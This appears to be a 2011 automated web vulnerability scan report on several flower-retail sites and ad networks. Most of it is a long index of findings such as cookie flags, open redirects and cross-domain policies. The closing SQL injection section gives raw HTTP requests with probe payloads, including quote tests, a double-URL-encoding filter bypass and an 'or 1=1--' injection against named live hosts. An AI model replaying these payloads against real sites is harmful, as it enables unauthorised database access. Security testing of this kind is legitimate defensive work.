4.173. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx [trackingpgroup parameter]

4.174. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx [trackingpgroup parameter]

4.175. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx [trackingpgroup parameter]

4.176. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/Order.aspx [trackingpgroup parameter]

4.177. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx [trackingpgroup parameter]

4.178. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/Order.aspx [trackingpgroup parameter]

4.179. https://orders.proflowers.com/OrderProcess/Order.aspx [trackingpgroup parameter]

4.180. http://pixel.fetchback.com/serve/fb/pdc [name parameter]

4.181. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [Ref parameter]

4.182. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [tile parameter]

4.183. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [trackingpgroup parameter]

4.184. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [Ref parameter]

4.185. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [tile parameter]

4.186. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [trackingpgroup parameter]

4.187. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [viewpos parameter]

4.188. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [Ref parameter]

4.189. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [tile parameter]

4.190. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [trackingpgroup parameter]

4.191. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [viewpos parameter]

4.192. http://sales.liveperson.net/hc/87011923/ [msessionkey parameter]

4.193. http://www.proflowers.com/house-plants-PBS [tile parameter]

4.194. http://www.proflowers.com/mothers-day-flowers-MDF [tile parameter]

4.195. http://www.proflowers.com/send-flowers-bsl [tile parameter]

4.196. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [PFC_BrowserId cookie]

4.197. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [PFC_BrowserId cookie]

4.198. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [PFC_BrowserId cookie]

4.199. http://seg.sharethis.com/getSegment.php [__stid cookie]

4.200. http://ww30.1800baskets.com/product.do [ShopperManagerEnterprise cookie]

4.201. http://ww30.1800baskets.com/product.do [ShopperManagerEnterprise cookie]

4.202. http://ww30.1800baskets.com/shoppingbasket.do [ShopperManagerEnterprise cookie]

4.203. http://ww30.1800baskets.com/shoppingbasket.do [ShopperManagerEnterprise cookie]

4.204. http://ww30.1800baskets.com/template.do [ShopperManagerEnterprise cookie]

4.205. http://ww30.1800flowers.com/collection.do [ShopperManagerEnterprise cookie]

4.206. http://ww30.1800flowers.com/collection.do [ShopperManagerEnterprise cookie]

4.207. http://ww30.1800flowers.com/product.do [ShopperManagerEnterprise cookie]

4.208. http://ww30.1800flowers.com/product.do [ShopperManagerEnterprise cookie]

4.209. http://ww30.1800flowers.com/shoppingbasket.do [ShopperManagerEnterprise cookie]

4.210. http://ww30.1800flowers.com/shoppingbasket.do [ShopperManagerEnterprise cookie]

4.211. https://ww30.1800flowers.com/checkoutsignin.do [ShopperManagerEnterprise cookie]

4.212. https://ww30.1800flowers.com/continueasguest.do [ShopperManagerEnterprise cookie]

5. Flash cross-domain policy

5.1. http://ad.doubleclick.net/crossdomain.xml

5.2. http://ads.undertone.com/crossdomain.xml

5.3. http://adsfac.us/crossdomain.xml

5.4. http://at.amgdgt.com/crossdomain.xml

5.5. http://b.scorecardresearch.com/crossdomain.xml

5.6. http://blooms.1800flowers.com/crossdomain.xml

5.7. http://bp.specificclick.net/crossdomain.xml

5.8. http://data.cmcore.com/crossdomain.xml

5.9. http://ib.adnxs.com/crossdomain.xml

5.10. http://idcs.interclick.com/crossdomain.xml

5.11. http://metrics.ftd.com/crossdomain.xml

5.12. http://pix04.revsci.net/crossdomain.xml

5.13. http://pixel.fetchback.com/crossdomain.xml

5.14. http://pixel.quantserve.com/crossdomain.xml

5.15. http://recs.richrelevance.com/crossdomain.xml

5.16. http://segment-pixel.invitemedia.com/crossdomain.xml

5.17. http://wa.proflowers.com/crossdomain.xml

5.18. http://googleads.g.doubleclick.net/crossdomain.xml

5.19. http://static.ak.fbcdn.net/crossdomain.xml

5.20. http://w.sharethis.com/crossdomain.xml

5.21. http://www.facebook.com/crossdomain.xml

5.22. http://www.ftd.com/crossdomain.xml

5.23. http://www.res-x.com/crossdomain.xml

5.24. http://www.proflowers.com/crossdomain.xml

6. Silverlight cross-domain policy

6.1. http://ad.doubleclick.net/clientaccesspolicy.xml

6.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

6.3. http://metrics.ftd.com/clientaccesspolicy.xml

6.4. http://wa.proflowers.com/clientaccesspolicy.xml

7. Cleartext submission of password

8. SSL cookie without secure flag set

8.1. https://accounts.proflowers.com/Default.aspx

8.2. https://ww30.1800flowers.com/checkoutsignin.do

8.3. https://ww30.1800flowers.com/continueasguest.do

8.4. https://accounts.proflowers.com/CustomerLogin.aspx

9. Session token in URL

9.1. http://l.sharethis.com/pview

9.2. http://sales.liveperson.net/hc/87011923/

9.3. http://t.p.mybuys.com/webrec/wr.do

10. Password field submitted using GET method

10.1. http://www.ftd.com/

10.2. http://www.ftd.com/

11. Open redirection

11.1. http://ad.trafficmp.com/a/bpix [r parameter]

11.2. http://pix04.revsci.net/K10145/a3/0/3/pg.302 [tgt parameter]

12. Cookie scoped to parent domain

12.1. http://ww30.1800baskets.com/include/cookieCloner.asp

12.2. http://ww30.1800flowers.com/

12.3. http://www.cherrymoonfarms.com/default.aspx

12.4. http://www.personalcreations.com/default.aspx

12.5. http://www.proflowers.com/

12.6. http://www.proflowers.com/house-plants-PBS

12.7. http://www.proflowers.com/mothers-day-flowers-MDF

12.8. http://www.proflowers.com/send-flowers-bsl

12.9. https://accounts.proflowers.com/CustomerLogin.aspx

12.10. https://accounts.proflowers.com/Default.aspx

12.11. http://ad.trafficmp.com/a/bpix

12.12. http://ads.revsci.net/adserver/ako

12.13. http://ads.revsci.net/adserver/ako

12.14. http://ads.revsci.net/adserver/ako

12.15. http://ads.revsci.net/adserver/ako

12.16. http://ads.revsci.net/adserver/ako

12.17. http://ads.revsci.net/adserver/ako

12.18. http://ads.revsci.net/adserver/ako

12.19. http://at.amgdgt.com/ads/

12.20. http://b.scorecardresearch.com/b

12.21. http://ib.adnxs.com/seg

12.22. http://idcs.interclick.com/Segment.aspx

12.23. http://leadback.advertising.com/adcedge/lb

12.24. http://metrics.ftd.com/b/ss/ftdprod/1/H.4-pdv-2/s48131725573912

12.25. http://pix04.revsci.net/K10145/a3/0/3/pg.302

12.26. http://pix04.revsci.net/K10145/a3/0/3/pg.302

12.27. http://pix04.revsci.net/K10145/a3/0/3/pg.302

12.28. http://pix04.revsci.net/K10145/a3/0/3/pg.302

12.29. http://pix04.revsci.net/K10145/a3/0/3/pg.302

12.30. http://pixel.fetchback.com/serve/fb/pdc

12.31. http://pixel.quantserve.com/pixel/p-0fxbD82AR3K-g.gif

12.32. http://pixel.rubiconproject.com/tap.php

12.33. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137

12.34. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396

12.35. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767

12.36. http://segment-pixel.invitemedia.com/pixel

12.37. http://t.p.mybuys.com/webrec/wr.do

12.38. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s82534269827883

12.39. http://www.ftd.com/351

13. Cookie without HttpOnly flag set

13.1. http://blooms.1800flowers.com/cm

13.2. http://t.p.mybuys.com/webrec/wr.do

13.3. http://ww30.1800baskets.com/deliverycalendarnew.do

13.4. http://ww30.1800baskets.com/include/cookieCloner.asp

13.5. http://ww30.1800baskets.com/shoppingbasket.do

13.6. http://ww30.1800baskets.com/template.do

13.7. http://ww30.1800flowers.com/

13.8. http://ww30.1800flowers.com/collection.do

13.9. http://ww30.1800flowers.com/deliverycalendarnew.do

13.10. http://ww30.1800flowers.com/guidedmodel.do

13.11. http://ww30.1800flowers.com/product.do

13.12. http://ww30.1800flowers.com/shoppingbasket.do

13.13. https://ww30.1800flowers.com/checkoutsignin.do

13.14. https://ww30.1800flowers.com/continueasguest.do

13.15. http://www.cherrymoonfarms.com/default.aspx

13.16. http://www.personalcreations.com/default.aspx

13.17. http://www.proflowers.com/

13.18. http://www.proflowers.com/house-plants-PBS

13.19. http://www.proflowers.com/mothers-day-flowers-MDF

13.20. http://www.proflowers.com/send-flowers-bsl

13.21. https://accounts.proflowers.com/CustomerLogin.aspx

13.22. https://accounts.proflowers.com/Default.aspx

13.23. http://ad.trafficmp.com/a/bpix

13.24. http://ad.yieldmanager.com/pixel

13.25. http://ads.revsci.net/adserver/ako

13.26. http://ads.revsci.net/adserver/ako

13.27. http://ads.revsci.net/adserver/ako

13.28. http://ads.revsci.net/adserver/ako

13.29. http://ads.revsci.net/adserver/ako

13.30. http://ads.revsci.net/adserver/ako

13.31. http://ads.revsci.net/adserver/ako

13.32. http://ads.undertone.com/fc.php

13.33. http://at.amgdgt.com/ads/

13.34. http://b.scorecardresearch.com/b

13.35. http://blooms.1800flowers.com/cm

13.36. http://ftd.com/

13.37. http://idcs.interclick.com/Segment.aspx

13.38. http://leadback.advertising.com/adcedge/lb

13.39. http://login.dotomi.com/ucm/UCMController

13.40. http://metrics.ftd.com/b/ss/ftdprod/1/H.4-pdv-2/s48131725573912

13.41. http://pix04.revsci.net/K10145/a3/0/3/pg.302

13.42. http://pix04.revsci.net/K10145/a3/0/3/pg.302

13.43. http://pix04.revsci.net/K10145/a3/0/3/pg.302

13.44. http://pix04.revsci.net/K10145/a3/0/3/pg.302

13.45. http://pix04.revsci.net/K10145/a3/0/3/pg.302

13.46. http://pixel.fetchback.com/serve/fb/pdc

13.47. http://pixel.quantserve.com/pixel/p-0fxbD82AR3K-g.gif

13.48. http://pixel.rubiconproject.com/tap.php

13.49. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137

13.50. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396

13.51. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767

13.52. http://recs.richrelevance.com/rrserver/p13n_generated.js

13.53. http://recs.richrelevance.com/rrserver/p13n_generated.js

13.54. http://recs.richrelevance.com/rrserver/p13n_generated.js

13.55. http://segment-pixel.invitemedia.com/pixel

13.56. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s82534269827883

13.57. http://www.ftd.com/351

14. Password field with autocomplete enabled

14.1. https://accounts.proflowers.com/CustomerLogin.aspx

14.2. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx

14.3. http://ww30.1800baskets.com/product.do

14.4. https://ww30.1800flowers.com/checkoutsignin.do

14.5. http://www.ftd.com/

14.6. http://www.ftd.com/

14.7. http://www.ftd.com/

14.8. http://www.ftd.com/

14.9. http://www.ftd.com/

15. Referer-dependent response

15.1. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx

15.2. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/Order.aspx

15.3. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/Order.aspx

15.4. http://www.facebook.com/plugins/like.php

16. Cross-domain Referer leakage

16.1. http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/instantservicechat.js

16.2. http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucpersonalizationselection.js

16.3. https://accounts.proflowers.com/CustomerLogin.aspx

16.4. https://accounts.proflowers.com/Default.aspx

16.5. http://adsfac.us/pct_mx.asp

16.6. http://adsfac.us/pct_mx.asp

16.7. http://adsfac.us/pct_mx.asp

16.8. http://bp.specificclick.net/

16.9. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx

16.10. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx

16.11. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx

16.12. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx

16.13. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx

16.14. https://orders.proflowers.com/orderprocess/(S(0v3osigpapgykefj2x3bhrjp))/UnhandledException.aspx

16.15. https://orders.proflowers.com/orderprocess/(S(n5adx40osduaxa0v1uiffnzo))/UnhandledException.aspx

16.16. http://pixel.fetchback.com/serve/fb/pdc

16.17. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137

16.18. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396

16.19. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767

16.20. http://track.searchignite.com/si/CM/Tracking/ClickTracking.aspx

16.21. http://ww30.1800baskets.com/deliverycalendarnew.do

16.22. http://ww30.1800baskets.com/product.do

16.23. http://ww30.1800baskets.com/template.do

16.24. http://ww30.1800flowers.com/collection.do

16.25. http://ww30.1800flowers.com/product.do

16.26. http://www.cherrymoonfarms.com/default.aspx

16.27. http://www.facebook.com/plugins/like.php

16.28. http://www.personalcreations.com/default.aspx

16.29. http://www.proflowers.com/default.aspx

16.30. http://www.proflowers.com/house-plants-PBS

16.31. http://www.proflowers.com/mothers-day-flowers-MDF

16.32. http://www.proflowers.com/send-flowers-bsl

17. Cross-domain script include

17.1. https://accounts.proflowers.com/CustomerLogin.aspx

17.2. https://accounts.proflowers.com/Default.aspx

17.3. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx

17.4. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx

17.5. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx

17.6. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx

17.7. https://orders.proflowers.com/orderprocess/(S(0v3osigpapgykefj2x3bhrjp))/UnhandledException.aspx

17.8. https://orders.proflowers.com/orderprocess/(S(n5adx40osduaxa0v1uiffnzo))/UnhandledException.aspx

17.9. http://pixel.fetchback.com/serve/fb/pdc

17.10. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137

17.11. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396

17.12. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767

17.13. http://ww30.1800baskets.com/deliverycalendarnew.do

17.14. http://ww30.1800baskets.com/product.do

17.15. http://ww30.1800baskets.com/shoppingbasket.do

17.16. http://ww30.1800baskets.com/template.do

17.17. http://ww30.1800flowers.com/

17.18. http://ww30.1800flowers.com/collection.do

17.19. http://ww30.1800flowers.com/product.do

17.20. http://ww30.1800flowers.com/shoppingbasket.do

17.21. https://ww30.1800flowers.com/checkoutsignin.do

17.22. https://ww30.1800flowers.com/continueasguest.do

17.23. http://www.cherrymoonfarms.com/default.aspx

17.24. http://www.facebook.com/plugins/like.php

17.25. http://www.ftd.com/

17.26. http://www.personalcreations.com/default.aspx

17.27. http://www.proflowers.com/

17.28. http://www.proflowers.com/default.aspx

17.29. http://www.proflowers.com/house-plants-PBS

17.30. http://www.proflowers.com/mothers-day-flowers-MDF

17.31. http://www.proflowers.com/send-flowers-bsl

18. TRACE method is enabled

18.1. http://att.adpxpx.com/

18.2. http://bp.specificclick.net/

18.3. http://metrics.ftd.com/

18.4. http://pixel.fetchback.com/

18.5. http://pixel.rubiconproject.com/

19. Email addresses disclosed

19.1. http://media3.1800flowers.com/800f_assets/jet/website/scripts/flowers/calendar/date.js

19.2. http://media5.1800flowers.com/800f_assets/jet/website/images/flowers/banners/linescale/survey-invitation.css

19.3. http://media5.1800flowers.com/800f_assets/jet/website/images/flowers/banners/linescale/survey-invitation.js

19.4. https://ww30.1800flowers.com/checkoutsignin.do

19.5. http://www.ftd.com/

20. Private IP addresses disclosed

20.1. http://static.ak.fbcdn.net/connect/xd_proxy.php

20.2. http://www.facebook.com/plugins/like.php

20.3. http://www.facebook.com/plugins/like.php

20.4. http://www.facebook.com/plugins/like.php

21. Robots.txt file

21.1. http://ad.doubleclick.net/activity

21.2. http://ads.undertone.com/fc.php

21.3. http://adsfac.us/pct_mx.asp

21.4. http://at.amgdgt.com/ads/

21.5. http://b.scorecardresearch.com/b

21.6. http://blooms.1800flowers.com/cm

21.7. http://data.cmcore.com/cookie-id.js

21.8. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx

21.9. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1014041578/

21.10. http://media1.1800flowers.com/800f_assets/jet/website/images/flowers/runtime/favicon.ico

21.11. http://media4.1800flowers.com/800f_assets/jet/website/styles/baskets/martha-tab_sep.css

21.12. http://media5.1800flowers.com/800f_assets/jet/website/images/flowers/carousel.html

21.13. http://media6.1800flowers.com/800f_assets/jet/website/images/baskets/runtime/favicon.ico

21.14. http://metrics.ftd.com/b/ss/ftdprod/1/H.4-pdv-2/s48131725573912

21.15. http://pixel.fetchback.com/serve/fb/pdc

21.16. http://pixel.quantserve.com/pixel/p-0fxbD82AR3K-g.gif

21.17. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137

21.18. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEY1oYDINqGAyoFWsMAAAEyBVbDAAAP

21.19. http://safebrowsing.clients.google.com/safebrowsing/gethash

21.20. http://segment-pixel.invitemedia.com/pixel

21.21. http://static.ak.fbcdn.net/connect/xd_proxy.php

21.22. http://t.p.mybuys.com/webrec/wr.do

21.23. http://toolbarqueries.clients.google.com/tbproxy/af/query

21.24. http://track.searchignite.com/si/CM/Tracking/ClickTracking.aspx

21.25. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s82534269827883

21.26. http://ww30.1800baskets.com/include/cookieCloner.asp

21.27. http://ww30.1800flowers.com/

21.28. https://ww30.1800flowers.com/checkoutsignin.do

21.29. http://www.facebook.com/plugins/like.php

21.30. http://www.ftd.com/

21.31. http://www.google-analytics.com/__utm.gif

21.32. http://www.googleadservices.com/pagead/conversion/1014041578/

21.33. http://www.proflowers.com/

21.34. http://www.res-x.com/ws/r2/Resonance.aspx

22. Cacheable HTTPS response

22.1. https://accounts.proflowers.com/CustomerLogin.aspx

22.2. https://accounts.proflowers.com/Default.aspx

22.3. https://orders.proflowers.com/OrderProcess/(S(0v3osigpapgykefj2x3bhrjp))/GiftOptions.aspx

22.4. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/ChangeCardMessage.aspx

22.5. https://orders.proflowers.com/OrderProcess/(S(4xfzv3s40m3e4ab0u5u12wx2))/IdentifyCustomer.aspx

22.6. https://orders.proflowers.com/OrderProcess/(S(n5adx40osduaxa0v1uiffnzo))/GiftOptions.aspx

22.7. https://orders.proflowers.com/orderprocess/(S(0v3osigpapgykefj2x3bhrjp))/UnhandledException.aspx

22.8. https://orders.proflowers.com/orderprocess/(S(n5adx40osduaxa0v1uiffnzo))/UnhandledException.aspx

23. HTML does not specify charset

23.1. http://a1128.g.akamai.net/favicon.ico

23.2. http://adsfac.us/pct_mx.asp

23.3. http://media5.1800flowers.com/800f_assets/jet/website/images/flowers/carousel.html

23.4. http://recs.richrelevance.com/favicon.ico

23.5. http://www.ftd.com/

23.6. http://www.ftd.com/empty/index.epl

23.7. http://www.ftd.com/empty/tealeaf.epl

24. Content type incorrectly stated

24.1. http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx

24.2. http://sales.liveperson.net/hcp/html/mTag.js

24.3. http://www.res-x.com/ws/r2/Resonance.aspx

25. SSL certificate

25.1. https://orders.proflowers.com/

25.2. https://ww30.1800flowers.com/



1. SQL injection  next
There are 24 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://recs.richrelevance.com/rrserver/p13n_generated.js [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://recs.richrelevance.com
Path:   /rrserver/p13n_generated.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /rrserver'/p13n_generated.js?a=c4522a5ae171c6b3&ts=1304903463511&p=%7C91637%7C93260&cts=http%3A%2F%2Fww30.1800baskets.com&pt=%7Ccart_page.bottom&s=847b741e4593439b8e3ed6040ba46630&pref=http%3A%2F%2Fww30.1800baskets.com%2Fproduct.do%3FbaseCode%3D93260%26dataset%3D11309&l=1 HTTP/1.1
Host: recs.richrelevance.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/shoppingbasket.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uc=525826ce-e29a-4f38-4315-024be4d0c771; pendprch=b82.1304902958185.null.59433447%7C; catvhc=d-eF0-g9tZ-B---%%; vihc=b82.1304903447691.15169998%7C82.1304902911700.59433447%7C; pvihc=b82.1304903447691.15169998%7C82.1304902911700.59433447%7C73.1303848202747.21158348%7C

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.8.44
Date: Mon, 09 May 2011 01:22:53 GMT
Content-Type: text/html;charset=utf-8
Connection: keep-alive
Content-Length: 1036

<html><head><title>Apache Tomcat/6.0.18 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...

Request 2

GET /rrserver''/p13n_generated.js?a=c4522a5ae171c6b3&ts=1304903463511&p=%7C91637%7C93260&cts=http%3A%2F%2Fww30.1800baskets.com&pt=%7Ccart_page.bottom&s=847b741e4593439b8e3ed6040ba46630&pref=http%3A%2F%2Fww30.1800baskets.com%2Fproduct.do%3FbaseCode%3D93260%26dataset%3D11309&l=1 HTTP/1.1
Host: recs.richrelevance.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/shoppingbasket.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uc=525826ce-e29a-4f38-4315-024be4d0c771; pendprch=b82.1304902958185.null.59433447%7C; catvhc=d-eF0-g9tZ-B---%%; vihc=b82.1304903447691.15169998%7C82.1304902911700.59433447%7C; pvihc=b82.1304903447691.15169998%7C82.1304902911700.59433447%7C73.1303848202747.21158348%7C

Response 2

HTTP/1.1 400 Bad Request
Server: nginx/0.8.44
Date: Mon, 09 May 2011 01:22:53 GMT
Connection: keep-alive
Content-Length: 0


1.2. http://recs.richrelevance.com/rrserver/p13n_generated.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://recs.richrelevance.com
Path:   /rrserver/p13n_generated.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /rrserver%2527/p13n_generated.js?a=c4522a5ae171c6b3&ts=1304903446324&cs=%7C11309%3AThe%20Popcorn%20Factory%20Birthday&p=93260&re=Y&cts=http%3A%2F%2Fww30.1800baskets.com&pt=%7Citem_page.right&s=847b741e4593439b8e3ed6040ba46630&pref=http%3A%2F%2Fww30.1800baskets.com%2Ftemplate.do%3Fid%3Dtemplate3%26page%3D2000&l=1 HTTP/1.1
Host: recs.richrelevance.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/product.do?baseCode=93260&dataset=11309
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uc=525826ce-e29a-4f38-4315-024be4d0c771; vihc=b82.1304902911700.59433447%7C; pvihc=b82.1304902911700.59433447%7C73.1303848202747.21158348%7C; pendprch=b82.1304902958185.null.59433447%7C; catvhc=d-eF0-g9tZ-B---%%

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.8.44
Date: Mon, 09 May 2011 01:22:07 GMT
Content-Type: text/html;charset=utf-8
Connection: keep-alive
Content-Length: 1048

<html><head><title>Apache Tomcat/6.0.18 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...

Request 2

GET /rrserver%2527%2527/p13n_generated.js?a=c4522a5ae171c6b3&ts=1304903446324&cs=%7C11309%3AThe%20Popcorn%20Factory%20Birthday&p=93260&re=Y&cts=http%3A%2F%2Fww30.1800baskets.com&pt=%7Citem_page.right&s=847b741e4593439b8e3ed6040ba46630&pref=http%3A%2F%2Fww30.1800baskets.com%2Ftemplate.do%3Fid%3Dtemplate3%26page%3D2000&l=1 HTTP/1.1
Host: recs.richrelevance.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/product.do?baseCode=93260&dataset=11309
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uc=525826ce-e29a-4f38-4315-024be4d0c771; vihc=b82.1304902911700.59433447%7C; pvihc=b82.1304902911700.59433447%7C73.1303848202747.21158348%7C; pendprch=b82.1304902958185.null.59433447%7C; catvhc=d-eF0-g9tZ-B---%%

Response 2

HTTP/1.1 400 Bad Request
Server: nginx/0.8.44
Date: Mon, 09 May 2011 01:22:08 GMT
Connection: keep-alive
Content-Length: 0


1.3. http://ww30.1800flowers.com/deliverycalendarnew.do [month parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ww30.1800flowers.com
Path:   /deliverycalendarnew.do

Issue detail

The month parameter appears to be vulnerable to SQL injection attacks. The payloads 12903751%20or%201%3d1--%20 and 12903751%20or%201%3d2--%20 were each submitted in the month parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /deliverycalendarnew.do?month=512903751%20or%201%3d1--%20&year=2011&locationType=1&itemCount=1&prodType=FPT&productPrice=59.99&zip=10010&country=&productSKU=91637L&contextPageType=PRODUCT&isGeoSell=false&field=deliveryDate&baseCode=91637&nextMonthAvailableCheck=true&page=product HTTP/1.1
Host: ww30.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/product.do?baseCode=91637&dataset=10305&cm_cid=d10305
Origin: http://ww30.1800flowers.com
X-Requested-With: XMLHttpRequest
